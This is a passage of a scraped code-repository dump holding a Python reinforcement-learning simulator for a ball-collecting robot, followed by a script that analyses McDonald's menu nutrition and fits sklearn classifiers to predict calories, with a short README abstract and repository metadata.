int(round(1.0*obstacle[0]/trans_scale))\n cy = simulator[\"height\"] - back_pixels - int(round(1.0*obstacle[1]/trans_scale))\n if self.check_window_state(cx, cy):\n self.frame[cx][cy] = self._params[\"Map.data.obstacle\"]\n # Red balls\n for r_ball in self.red_balls:\n if self.state_blink == False or random.random() > (0.3 + 0.5*r_ball[1]/3.0/(map_param[\"height\"]/2)):\n if r_ball[1] >= int(ball_blind_slope*(abs(1.0*r_ball[0])-ball_blind_bias)):\n r_ball_x = r_ball[0]\n r_ball_y = r_ball[1]\n if self.state_inaccurate:\n r_ball_x = r_ball_x + random.random()*map_param[\"center\"]*(0.1*r_ball_x*r_ball_x/map_param[\"center\"]/map_param[\"center\"] - 0.05)\n r_ball_y = r_ball_y + random.random()*map_param[\"center\"]*(0.1*r_ball_y*r_ball_y/map_param[\"center\"]/map_param[\"center\"] - 0.05)\n cx = simulator[\"center\"] + int(round(1.0*r_ball_x/trans_scale))\n cy = simulator[\"height\"] - back_pixels - int(round(1.0*r_ball_y/trans_scale))\n if self.check_window_state(cx, cy):\n self.frame[cx][cy] = self._params[\"Map.data.red_ball\"]\n # Blue balls\n for b_ball in self.blue_balls:\n if self.state_blink == False or random.random() > (0.3 + 0.05*b_ball[1]/3.0/(map_param[\"height\"]/2)):\n if b_ball[1] >= int(ball_blind_slope*(abs(1.0*b_ball[0])-ball_blind_bias)):\n b_ball_x = b_ball[0]\n b_ball_y = b_ball[1]\n if self.state_inaccurate:\n b_ball_x = b_ball_x + random.random()*map_param[\"center\"]*(0.1*b_ball_x*b_ball_x/map_param[\"center\"]/map_param[\"center\"] - 0.05)\n b_ball_y = b_ball_y + random.random()*map_param[\"center\"]*(0.1*b_ball_y*b_ball_y/map_param[\"center\"]/map_param[\"center\"] - 0.05)\n cx = simulator[\"center\"] + int(round(1.0*b_ball_x/trans_scale))\n cy = simulator[\"height\"] - back_pixels - int(round(1.0*b_ball_y/trans_scale))\n if self.check_window_state(cx, cy):\n self.frame[cx][cy] = self._params[\"Map.data.blue_ball\"]\n\n self.frame[simulator[\"center\"]][simulator[\"height\"]-back_pixels] = 255\n\n self.draw_state_gray()\n\n return self.frame\n\n def get_reward(self, action):\n reward = 0\n red_balls_temp = []\n blue_balls_temp = []\n\n # reward for red ball\n for i, r_ball in enumerate(self.red_balls):\n cx = round(1.0*r_ball[0]/trans_scale)\n cy = round(1.0*r_ball[1]/trans_scale)\n if cy < reward_region_y and cy >= 0 and r_ball[1] >= int(ball_blind_slope*(abs(1.0*r_ball[0])-ball_blind_bias)-2) and (cx in reward_region_x):\n if cx == reward_region_x[1]:\n reward += 10\n else:\n reward += 7\n # For sorting plate\n if len(self.red_balls_prev) > 0 and int(round(1.0*self.red_balls_prev[i][1]/trans_scale)) < reward_region_y or\\\n self.sorting_plate_state != sorting_plate_state_dic['RED']:\n reward = -2\n else:\n red_balls_temp.append(r_ball)\n\n # reward for blue ball\n for i, b_ball in enumerate(self.blue_balls):\n cx = round(1.0*b_ball[0]/trans_scale)\n cy = round(1.0*b_ball[1]/trans_scale)\n if cy < reward_region_y and cy >=0 and b_ball[1] >= int(ball_blind_slope*(abs(1.0*b_ball[0])-ball_blind_bias)-2) and (cx in reward_region_x):\n if cx == reward_region_x[1]:\n reward += 10\n else:\n reward += 7\n if len(self.blue_balls_prev) > 0 and int(round(1.0*self.blue_balls_prev[i][1]/trans_scale)) < reward_region_y or\\\n self.sorting_plate_state != sorting_plate_state_dic['BLUE']:\n reward = -2\n else:\n blue_balls_temp.append(b_ball)\n\n self.red_balls = red_balls_temp\n self.blue_balls = blue_balls_temp\n\n red_balls_inscreen = []\n blue_balls_inscreen = []\n for r_ball in red_balls_temp:\n if r_ball[1] >= ball_blind_slope * (abs(1.0*r_ball[0]) - ball_blind_bias)\\\n and abs(1.0*r_ball[0]) <= map_param[\"center\"] and abs(1.0*r_ball[1]) < map_param[\"height\"]:\n red_balls_inscreen.append(r_ball)\n for b_ball in blue_balls_temp:\n if b_ball[1] >= ball_blind_slope * (abs(1.0*b_ball[0]) - ball_blind_bias)\\\n and abs(1.0*b_ball[0]) <= map_param[\"center\"] and abs(1.0*b_ball[1]) < map_param[\"height\"]:\n blue_balls_inscreen.append(b_ball)\n\n if action in range(self.action_space.size):\n if len(red_balls_inscreen) == 0 and len(blue_balls_inscreen) == 0:\n self.ball_inscreen_flag = self.ball_inscreen_flag + 1\n if action == 8:\n reward += 0.001\n else:\n self.ball_inscreen_flag = 0\n\n if (len(red_balls_temp) == 0 and len(blue_balls_temp) == 0) or self.iter > max_iter or self.ball_inscreen_flag >= 10:\n self.done = True\n\n if self.done:\n self.episode_rewards.append(self.score)\n if self.write_flag:\n self.video.release()\n print (\"video saved\")\n\n if action == -1:\n return -1\n else:\n return reward\n\n def get_reward_wit(self, action):\n reward = 0\n red_balls_temp = []\n blue_balls_temp = []\n\n # Give reward if we move closer to the nearest ball\n ball_list = np.concatenate([x for x in [self.red_balls, self.blue_balls] if len(x) > 0]).tolist()\n found_flag = False\n if ball_list:\n ball_distances = np.sum(np.asarray(ball_list)**2, axis=1)\n sorted_indices = np.argsort(ball_distances)\n for index in sorted_indices:\n if in_camera_range(ball_list[index]) and no_wall_blocking([0, 0], ball_list[index], self.obstacles):\n if self.index_prev != -1:\n nearest_ball_cur = self.red_balls[index] if index < len(self.red_balls) else self.blue_balls[index - len(self.red_balls)]\n nearest_ball_prev = self.red_balls_prev[self.index_prev] if self.index_prev < len(self.red_balls_prev) else self.blue_balls_prev[self.index_prev - len(self.red_balls_prev)]\n d_cur = pow(nearest_ball_cur[0], 2) + pow(nearest_ball_cur[1], 2)\n d_prev = pow(nearest_ball_prev[0], 2) + pow(nearest_ball_prev[1], 2)\n if d_cur < d_prev and index == self.index_prev:\n reward += round(0.5*math.sqrt(d_prev - d_cur), 4)\n self.index_prev = index\n found_flag = True\n break\n if not found_flag:\n self.index_prev = -1\n\n # Give reward if the robot collect the ball\n for i, r_ball in enumerate(self.red_balls):\n # If any ball collectable\n if collectable(r_ball):\n if i == self.index_prev:\n self.index_prev = -1\n reward += calculate_reward(r_ball)\n # No reward for sorting plate yet\n else:\n red_balls_temp.append(r_ball)\n\n for i, b_ball in enumerate(self.blue_balls):\n if collectable(b_ball):\n if i + len(self.red_balls) == self.index_prev:\n self.index_prev = -1\n reward += calculate_reward(b_ball)\n # No reward for sorting plate yet\n else:\n blue_balls_temp.append(b_ball)\n\n # Remaining balls --------------------------------------------------------------------\n self.red_balls = red_balls_temp # list\n self.blue_balls = blue_balls_temp\n\n red_balls_inscreen = []\n blue_balls_inscreen = []\n for r_ball in red_balls_temp:\n if r_ball[1] >= ball_blind_slope*(abs(1.0*r_ball[0]) - ball_blind_bias) and abs(1.0*r_ball[0]) <= map_param[\"center\"] and abs(1.0*r_ball[1]) < map_param[\"height\"]:\n red_balls_inscreen.append(r_ball)\n for b_ball in blue_balls_temp:\n if b_ball[1] >= ball_blind_slope*(abs(1.0*b_ball[0]) - ball_blind_bias) and abs(1.0*b_ball[0]) <= map_param[\"center\"] and abs(1.0*b_ball[1]) < map_param[\"height\"]:\n blue_balls_inscreen.append(b_ball)\n\n if action in range(self.action_space.size):\n if len(red_balls_inscreen) == 0 and len(blue_balls_inscreen) == 0:\n self.ball_inscreen_flag = self.ball_inscreen_flag + 1\n if action == 8:\n reward += 0.001\n else:\n self.ball_inscreen_flag = 0\n\n if (len(red_balls_temp) == 0 and len(blue_balls_temp) == 0) or self.iter > max_iter: # or self.ball_inscreen_flag >= 10:\n self.done = True\n # Just for debugging to see why it stops\n if len(red_balls_temp) == 0 and len(blue_balls_temp) == 0:\n print('len(red_balls_temp) == 0 and len(blue_balls_temp) == 0')\n if self.iter > max_iter:\n print('self.iter > max_iter')\n if self.ball_inscreen_flag >= 10:\n print('self.ball_inscreen_flag >= 10')\n\n if self.done:\n self.episode_rewards.append(self.score)\n if self.write_flag:\n self.video.release()\n print (\"video saved\")\n\n if action == -1:\n return -1 # Penalize if doesn't move (I think because I bypass in the step funtion if action == -1, we won't reach this point)\n else:\n return reward\n \n def step(self, action):\n if action in range(self.action_space.size):\n self.iter = self.iter + 1\n\n del_x, del_y, rot = 0, 0, 0\n\n if action == 0: # forward\n del_x, del_y = 0, -1\n elif action == 1: # forward right\n del_x, del_y = -1, -1\n elif action == 2: # right\n del_x, del_y = -1, 0\n elif action == 3: # backward right\n del_x, del_y = -1, 1\n elif action == 4: # backward\n del_x, del_y = 0, 1\n elif action == 5: # bacward left\n del_x, del_y = 1, 1\n elif action == 6: # left\n del_x, del_y = 1, 0\n elif action == 7: # forward left\n del_x, del_y = 1, -1\n elif action == 8: # rotate left\n rot = -1\n elif action == 9: # rotate right\n rot = 1\n elif action == 10:\n del_x, del_y, self.sorting_plate_state = 0, -1, sorting_plate_state_dic['RED']\n elif action == 11:\n del_x, del_y, self.sorting_plate_state = 0, -1, sorting_plate_state_dic['BLUE']\n else:\n del_x, del_y, rot = 0, 0, 0\n\n reward = 0\n if action not in [-1]: # Perform action if action not in this list\n red_balls_temp = []\n blue_balls_temp = []\n obstacles_temp = []\n\n del_x = del_x # * 10\n del_y = del_y # * 10\n\n if len(self.red_balls) > 0:\n red_balls_temp = np.add(self.red_balls, [del_x,del_y])\n\n if len(self.blue_balls) > 0:\n blue_balls_temp = np.add(self.blue_balls, [del_x,del_y])\n\n if len(self.obstacles) > 0:\n obstacles_temp = np.add(self.obstacles, [del_x,del_y])\n\n if action == 8 or action == 9:\n points = np.concatenate([x for x in [red_balls_temp, blue_balls_temp, obstacles_temp] if len(x) > 0])\n if points.size > 0:\n points = points.reshape(-1,2)\n theta = rot_scale*rot*np.pi/180\n theta_0 = np.arctan2(points.T[1], points.T[0])\n\n ball_dist = np.linalg.norm(points, axis=1)\n rot_delta_unit_x = np.subtract(np.cos(theta_0), np.cos(np.add(theta_0,theta)))\n rot_delta_unit_y = np.subtract(np.sin(theta_0), np.sin(np.add(theta_0,theta)))\n rot_delta_unit = np.concatenate((rot_delta_unit_x.reshape(-1,1), rot_delta_unit_y.reshape(-1,1)), axis=1)\n ball_dist = np.concatenate((ball_dist.reshape(-1,1), ball_dist.reshape(-1,1)), axis=1)\n rot_delta = np.multiply(ball_dist, rot_delta_unit)\n points = np.subtract(points, rot_delta)\n red_balls_temp = points[0:len(self.red_balls)] # This is numpy array. Be careful\n blue_balls_temp = points[len(self.red_balls):len(self.red_balls)+len(self.blue_balls)]\n obstacles_temp = points[len(self.red_balls)+len(self.blue_balls):]\n\n enable_move = True\n for obstacle in obstacles_temp:\n if abs(obstacle[0]) < R_X and abs(obstacle[1]) < R_Y: # Here, parameter is in map scale\n # if abs(1.0*obstacle[0]) < 4.0*trans_scale/3 and abs(1.0*obstacle[1]) < 8.0*trans_scale/3:\n enable_move = False\n\n if enable_move:\n self.red_balls = red_balls_temp # This is numpy array. Be careful\n self.blue_balls = blue_balls_temp\n reward = self.get_reward_wit(action)\n self.obstacles = obstacles_temp\n self.draw_state()\n self.red_balls_prev = self.red_balls\n self.blue_balls_prev = self.blue_balls\n else:\n # print('Cannot move') # Just for debugging\n # reward = self.get_reward_wit(-1) # Can we just bypass this if cannot move? Because nothing will change?\n reward = -2\n else:\n reward = -1 # Doesn't do anything\n\n self.score = self.score + reward\n self.current_reward = reward # Add by myself\n\n if self.write_flag:\n frame_debug = self.draw_debug_frame(self.frame)\n self.video.write(frame_debug)\n\n if self.debug_flag:\n frame_debug = self.draw_debug_frame(self.frame)\n # cv2.imshow(\"frame_debug\", frame_debug)\n cv2.imshow(\"frame_debug_gray\", self.frame_gray)\n cv2.imshow(\"frame_wit\", self.draw_environment()) # Add by myself\n cv2.waitKey(100)\n\n return self.frame_gray, reward, self.done\n\n def get_total_steps(self):\n return self.iter\n\n def get_episode_rewards(self):\n return self.episode_rewards\n\n def action_space_sample(self):\n index = int(1.0*random.random()*self.action_space.size)\n return self.action_space[index]\n \n\n# Added functions ##############################################################################\ndef closest_point(point, point_list):\n \"\"\"\n Return index of a point in the list that is closest to the given point, -1 if no such point\n \"\"\"\n if len(point_list):\n points = np.asarray(point_list)\n distances = np.sum((points - point)**2, axis=1)\n index = np.argmin(distances)\n return index\n else:\n return -1\n\n\ndef distance_from_point(point, point_list):\n \"\"\"\n Calculate all distances from point to each point in the point_list\n \"\"\"\n if len(point_list):\n return np.sum((np.asarray(point_list) - point)**2, axis=1)\n else:\n return []\n\n\ndef get_nearest_seeable_ball_index(point, point_list, obstacle_list):\n \"\"\"\n Get index of the nearest seeable ball in the point_list, -1 if no such ball\n \"\"\"\n if point_list:\n ball_distances = np.sum((np.asarray(point_list) - point)**2, axis=1)\n sorted_indices = np.argsort(ball_distances)\n for index in sorted_indices:\n if in_camera_range(point_list[index]) and no_wall_blocking([0, 0], point_list[index], obstacle_list):\n return index\n return -1\n else:\n return -1\n\n\ndef in_camera_range(pt):\n \"\"\"\n Check if pt is in the camera range\n\n Input: [x,y] in map scale\n \"\"\"\n if (pt[1] > 0) and (pt[1] > ball_blind_slope*(abs(pt[0]) - ball_blind_bias_map)):\n return True\n else:\n return False\n\n\ndef collectable(pt):\n \"\"\"\n Check if the ball can be collected\n\n Input: [x,y] in map scale\n \"\"\"\n if (R_Y <= pt[1] and pt[1] < R_Y + COLLECT_Y) and (pt[1] > ball_blind_slope*(abs(pt[0]) - ball_blind_bias_map)) and abs(pt[0]) <= COLLECT_X:\n return True\n else:\n return False\n\n\ndef calculate_reward(pt):\n \"\"\"\n Calculate reward for a ball at pt\n\n Input: [x,y] in map scale\n \"\"\"\n d = abs(pt[0])\n if d < COLLECT_X/3:\n return 10\n else:\n return 7\n\n\ndef no_wall_blocking(pt1, pt2, obstacles_list):\n \"\"\"\n Check if there is a wall blocking a path from pt1 to pt2\n\n Input: [x,y] in map scale\n \n Note: Valid only when the ball in front of the robot\n \"\"\"\n wall_integer = np.int_(np.round(obstacles_list)).tolist()\n loop_x = True if pt2[0]-pt1[0] >= pt2[1]-pt1[1] else False\n\n if loop_x: # Check above and below\n slope = (pt2[1] - pt1[1])/(pt2[0] - pt1[0])\n for x in range(int(round(pt1[0] + R_X)), int(round(pt2[0]))):\n y = int(round(slope*x))\n if ([x, y-1] in wall_integer) or ([x, y+1] in wall_integer):\n return False\n else: # Check left and right\n slope = (pt2[0] - pt1[0])/(pt2[1] - pt1[1])\n for y in range(int(round(pt1[1] + R_Y)), int(round(pt2[1]))):\n x = int(round(slope*y))\n if ([x-1, y] in wall_integer) or ([x+1, y] in wall_integer):\n return False\n return True\n\n###############################################################################################\n\n\nif __name__ == '__main__':\n tk = Task(debug_flag=True, test_flag=False, state_blink=False, state_inaccurate=False)\n tk.reset()\n\n action = -1\n while(1):\n tk.step(action)\n key = cv2.waitKey(300)&0xFF\n action = -1\n if key == ord('q') or tk.done == True:\n break\n \n elif key == ord('e'): # forward\n action = 0\n elif key == ord('r'): # forward right\n action = 1\n elif key == ord('w'): # forward left\n action = 7\n \n elif key == ord('f'): # right\n action = 2\n elif key == ord('s'): # left\n action = 6\n \n \n elif key == ord('d'): # backward\n action = 4\n elif key == ord('v'): # backward right\n action = 3\n elif key == ord('x'): # bacward left\n action = 5\n \n \n elif key == ord('a'): # Rotate left\n action = 8\n elif key == ord('g'): # Rotate right\n action = 9\n \n elif key == ord('1'):\n action = 10\n elif key == ord('2'):\n action = 11\n\n print(\"shutdown\")\n # cv2.destroyAllWindows()\n" } ]
2
declanoconnor/CaloriePrediction
https://github.com/declanoconnor/CaloriePrediction
6db733afe119ccdac98727a1ece994c217510f6c
7158977193ffeaf10aea2cb20dcaf7035b14c5ec
ee38fb78c56afc1772ccde43d8f1b9d005d727ab
refs/heads/master
2020-04-30T22:57:32.148519
2019-06-21T10:58:53
2019-06-21T10:58:53
177,132,315
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6815565824508667, "alphanum_fraction": 0.7076824903488159, "avg_line_length": 35.245033264160156, "blob_id": "0e1dea04fc860237b6e0a56e41ff7f9baae5274a", "content_id": "f63e98c80453481ffa459462322223a8b176f73e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10947, "license_type": "no_license", "max_line_length": 159, "num_lines": 302, "path": "/Correlation&Prediction.py", "repo_name": "declanoconnor/CaloriePrediction", "src_encoding": "UTF-8", "text": "#Libraries for Processing\nimport numpy as np #Linear algebra\nimport pandas as pd #Data processing\nfrom pandas.tools import plotting #CSV file I/O (e.g. pd.read_csv), data manipulation as in SQL\nimport matplotlib.pyplot as plt #For Plotting\nimport seaborn as sns #Additional Plotting\n#import keras\n#from keras.models import Sequential\n#from keras.layers import Dense\n\n#SKLEARN MODULES FOR MACHINE LEARNING\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm \nfrom sklearn.linear_model import LogisticRegression \nfrom sklearn.naive_bayes import GaussianNB \nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\n\n\nfrom sklearn.model_selection import train_test_split # to split the data into two parts\nfrom sklearn import metrics # for the check the error and accuracy of the model\n\n#OTHER TESTED FEATURES\n#from sklearn.model_selection import GridSearchCV# for tuning parameter\n#from sklearn.metrics import accuracy_score\n#from sklearn.metrics import average_precision_score\n#from sklearn.preprocessing import StandardScaler, LabelBinarizer\n#from sklearn.preprocessing import LabelEncoder\n#from sklearn.linear_model import LinearRegression\n\n#CLEANING UP\nimport warnings\nwarnings.filterwarnings('ignore')\n\n#%%\n\n#READ IN OUR DATA\ndata = pd.read_csv(\"C:/Users/user/Desktop/mdmenu.csv\",header=0) #here header 0 takes away first row\n\n#TEST DATA IS AS SHOWS\n#print(data.head(2))\n#data.info()\n#print(md.isnull().any())\n\n#%% FOR PLOTS ###\nfeatures_all=list(data.columns[1:14])\nprint(features_all)\ndata.describe()\n\nfeatures_corgraph=list(data.columns[1:16])\nprint(features_corgraph)\n\ndata.groupby('Category')['Item'].count().plot(kind='bar')\n\nsns.boxplot(data= data, x ='Category',y = 'Dietary Fiber')\nplt.tight_layout\nplt.show()\n\nMax_Cal = data.groupby('Category').max().sort_values('Dietary Fiber',ascending=False)\nsns.swarmplot(data =Max_Cal, x= Max_Cal.index,y = 'Calories', hue ='Item',size =10)\nplt.tight_layout()\n\nmeasures = ['Calories', 'Total Fat', 'Cholesterol','Sodium', 'Sugars', 'Carbohydrates']\n\nfor m in measures: \n plot = sns.violinplot(x=\"Category\", y=m, data=data)\n plt.setp(plot.get_xticklabels(), size=7)\n plt.title(m)\n plt.show()\n\nfor m in measures:\n g = sns.factorplot(x=\"Category\", y=m,data=data, kind=\"swarm\",size=5, aspect=2.5);\n \n#%% DAILY RECOMENDATIONS ###\n \nCaloriesPercentage = data['Calories'] / 2500 * 100\n\nTotalFatPercentage = data['Total Fat'] / 66 * 100\nSaturatedFatPercentage = data['Saturated Fat'] / 20 * 100\nCholesterolPercentage = data['Cholesterol'] / 300 * 100\nSodiumPercentage = data['Sodium'] / 2380 * 100\nCarbohydratesPercentage = data['Carbohydrates'] / 310 * 100\nDietaryFiberPercentage = data['Dietary Fiber'] / 30 * 100\n#print(CaloriesPercentage)\n\n\n#%% #KDE Plots ###\n\nf, axes = plt.subplots(2, 3, figsize=(10, 6.666), sharex=True, sharey=True)\n\ns = np.linspace(0, 3, 10)\ncmap = sns.cubehelix_palette(start=0.0, light=1, as_cmap=True)\n\nx = CaloriesPercentage\ny = TotalFatPercentage\nsns.kdeplot(x, y, cmap=cmap, shade=True, cut=5, ax=axes[0,0])\naxes[0,0].set(xlim=(-10, 50), ylim=(-30, 70), title = 'Fat')\n\nmap = sns.cubehelix_palette(start=0.333333333333, light=1, as_cmap=True)\n\n\nx = CaloriesPercentage\ny = SaturatedFatPercentage\nsns.kdeplot(x, y, cmap=cmap, shade=True, ax=axes[0,1])\naxes[0,1].set(xlim=(-5, 50), ylim=(-10, 70), title = 'Saturated Fat')\n\ncmap = sns.cubehelix_palette(start=0.666666666667, light=1, as_cmap=True)\n\nx = CaloriesPercentage\ny = CholesterolPercentage\nsns.kdeplot(x, y, cmap=cmap, shade=True, ax=axes[0,2])\naxes[0,2].set(xlim=(-5, 50), ylim=(-10, 70), title = 'Cholesterol')\n\ncmap = sns.cubehelix_palette(start=1.0, light=1, as_cmap=True)\n\nx = CaloriesPercentage\ny = SodiumPercentage\nsns.kdeplot(x, y, cmap=cmap, shade=True, ax=axes[1,0])\naxes[1,0].set(xlim=(-5, 50), ylim=(-10, 70), title = 'Sodium')\n\ncmap = sns.cubehelix_palette(start=1.333333333333, light=1, as_cmap=True)\n\nx = CaloriesPercentage\ny = CarbohydratesPercentage\nsns.kdeplot(x, y, cmap=cmap, shade=True, ax=axes[1,1])\naxes[1,1].set(xlim=(-5, 50), ylim=(-10, 70), title = 'Carbohydrates')\n\ncmap = sns.cubehelix_palette(start=1.666666666667, light=1, as_cmap=True)\n\nx = CaloriesPercentage\ny = DietaryFiberPercentage\nsns.kdeplot(x, y, cmap=cmap, shade=True, ax=axes[1,2])\naxes[1,2].set(xlim=(-5, 50), ylim=(-10, 70), title = 'Dietary Fiber')\n\nf.tight_layout()\n\n\n#%% Correlation Graph ###\n\ncorr = data[features_corgraph].corr()\nplt.figure(figsize=(15,15))\nsns.heatmap(corr, cbar = True, square = True, annot=True, fmt= '.2f',annot_kws={'size': 8},\n xticklabels= features_all, yticklabels= features_all,\n cmap= 'RdPu')\n\n#coolwarm\n\n#%% INITALISATION FOR MACHINE LEARNING ###\n\n#Adding in features that will \nprediction_var1 = ['Dietary Fiber (% Daily Value)','Vitamin A (% Daily Value)', 'Vitamin C (% Daily Value)', 'Calcium (% Daily Value)', 'Iron (% Daily Value)']\nprediction_var = ['Calories','Carbohydrates','Protein','Total Fat','Cholesterol',\n 'Sugars','Saturated Fat', 'Trans Fat',\n 'Dietary Fiber','Sodium']\ntrain, test = train_test_split(data, test_size = 0.2)\n(train.shape)\n(test.shape)\n\n#print(test.shape)\n#print(train.shape)\ntrain_X = train[prediction_var]\ntrain_y= train.Calories\ntest_X= test[prediction_var]\ntest_y= test.Calories\n\n#%% Random Forest Classifier ###\n\nmodel=RandomForestClassifier(n_estimators=100)\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------Random Forest------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\nimportances = model.feature_importances_\nstd = np.std([tree.feature_importances_ for tree in model.estimators_],\n axis=0)\nindices = np.argsort(importances)[::-1]\n\n# Print the feature ranking\nprint(\"Feature ranking:\")\n\nfor f in range(test_X.shape[1]):\n print(\"%d. feature %d (%f)\" % (f + 1, indices[f], importances[indices[f]]))\n\n# Plot the feature importances of the forest\nplt.figure()\nplt.title(\"Feature importances\")\nplt.bar(range(test_X.shape[1]), importances[indices],\n color=\"b\", yerr=std[indices], align=\"center\")\nplt.xticks(range(train_X.shape[1]), indices)\nplt.xlim([-1, test_X.shape[1]])\nplt.show()\n\n#%% Support Vector Machine ###\n\nmodel = svm.SVC(kernel='linear')\nmodel.fit(train_X,train_y)\nprint('')\nprint('------SVM------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% LogisticRegression ###\n\nmodel = LogisticRegression()\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------Logistic Regression------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% GaussianNaivebayes ###\n\nmodel = GaussianNB()\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------Gaussian NaiveBayes------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% DecisionTree ###\n\nmodel = DecisionTreeClassifier(max_leaf_nodes=3)\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------Decision Tree------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% ExtraTrees ###\n\nmodel = ExtraTreesClassifier()\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------Extra Tree Classifier------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% KNN ###\n\nmodel = KNeighborsClassifier()\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------KNN------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% MLP ###\nclf = MLPClassifier(#hidden_layer_sizes=(128,64,32), \n\t\t\t\t\tactivation='relu', \n solver='adam',\n \t\t\t\tbeta_1=0.6, \n \t\t\t\tbeta_2=0.9,\n alpha = 0.001,\n early_stopping = True,\n shuffle = True,\n warm_start = True,\n validation_fraction = 0.3,\n \t\t\t\tlearning_rate_init=0.01, \n \t\t\t\tmax_iter = 14000, \n \t\t\t\trandom_state = 1235, \n \t\t\t\tlearning_rate='adaptive' \n \t\t\t\t)\nmodel = clf\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------MLP------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% Scatter Plot Matrix ###\n\ndata['Category']=data['Category'].map({'Breakfast':0,'Beef & Pork':1,'Chicken & Fish':2,'Salads':3,'Snacks & Sides':4,'Desserts':5,'Smoothies & Shakes':6})\ncolor_function = {0: \"blue\", 1: \"red\", 2: \"red\", 3: \"red\", 4: \"red\", 5: \"red\", 6: \"red\"}\ncolors = data[\"Category\"].map(lambda x: color_function.get(x))# mapping the color fuction with diagnosis column\npd.plotting.scatter_matrix(data[prediction_var], c=colors, alpha = 0.5, figsize = (15, 15)); # plotting scatter plot matrix\n\n" }, { "alpha_fraction": 0.8281829357147217, "alphanum_fraction": 0.8281829357147217, "avg_line_length": 268.6666564941406, "blob_id": "75ecb6c46b6a3655c8082a8d530959fb727ac3b7", "content_id": "d0e85ab20f104ad63a22f6ac4041f11e4ecf00a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 809, "license_type": "no_license", "max_line_length": 722, "num_lines": 3, "path": "/README.md", "repo_name": "declanoconnor/CaloriePrediction", "src_encoding": "UTF-8", "text": "An essay was written for this project, the following is the abstract from the paper:\n\nAnalyzing the nutritional structure of any consumer product is a laborious and costly process. Protein, carbohydrates, fats, sodium among other key elements are legally required and are determining factors for calorie content. Typically, a bomb calorimeter is used for accurate calorie measurement, however, calories can also be measured by nutritional content analysis. Currently, the approach for doing so is the Atwater System or similar revisions of this method. This paper proposes an alternative method by using existing ML techniques to determine caloric content. The proposal is tested on two popular fast-food menus, this paper then discusses the efficacy of the methods and hypothesises other probable solutions.\n" } ]
2
kossam001/GAME3110-Assignment3
https://github.com/kossam001/GAME3110-Assignment3
fe39b904f1df4fcf9f62435217d6c1ff93476f66
7e41dd7fd445d168dae4f7e46a3c5e03020c89a6
b547634b70ab9979132bbe9aab1b7e95e3f13ab8
refs/heads/main
2023-01-10T10:51:52.949440
2020-11-08T19:31:42
2020-11-08T19:31:42
310,436,260
0
0
null
null
null
null
null
